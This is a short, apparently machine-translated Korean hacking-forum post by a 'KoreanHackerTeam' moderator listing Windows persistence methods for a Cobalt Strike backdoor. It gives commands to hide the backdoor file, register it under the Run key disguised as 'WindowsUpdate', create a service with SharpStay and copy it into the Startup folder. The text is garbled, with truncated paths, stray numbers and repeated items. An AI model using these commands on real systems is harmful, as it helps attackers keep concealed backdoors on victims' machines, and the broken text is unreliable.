KoreanHackerTeam
Moderator
1. 레지스트리 시작에 대한 참고 :이 방법은 작업을 유지하기 위해 이러한 방식으로 권한을 유지하는 데 사용됩니다 .Exe는 CS에서 생성 한 백도어 파일입니다. 여기서 백도어 파일은 숨겨진 파일을 죽이는 것을 피하는 데 사용될 수 있습니다. Shell Attrib C: \ Windows \ Task.exe +S +H
레지스트리 시작 Backdoor 파일 쉘 reg add hklm \ microsoft \ Windows \ CurrentVersion \ run /v WindowsUpdate /t reg_sz /d 'C: \ Windows \ task.exe' /f 010-6901
2. Windows 서비스는 숨겨진 파일 쉘 attrib c: \ wind
또는
3.sharpstay.exe 자동화 작업 SharpStay.exe Action=ServiceName=Debug Command='C: \ Windows \ Task.exe'33600110-69508 35000-
4. 서비스 디렉토리를 자동으로 시작합니다 (Win7 시스템은 유효합니다) 쉘 사본 'C: \ Wind '%programdata%\ microsoft \ windows \ start 메뉴 \ 프로그램 \ startup \ wind
2. Windows 서비스는 숨겨진 파일 쉘 attrib c: \ wind
4. 서비스 디렉토리를 자동으로 시작합니다 (Win7 시스템은 유효합니다) 쉘 사본 'C: \ Wind '%programdata%\ microsoft \ windows \ start 메뉴 \ 프로그램 \ startup \ wind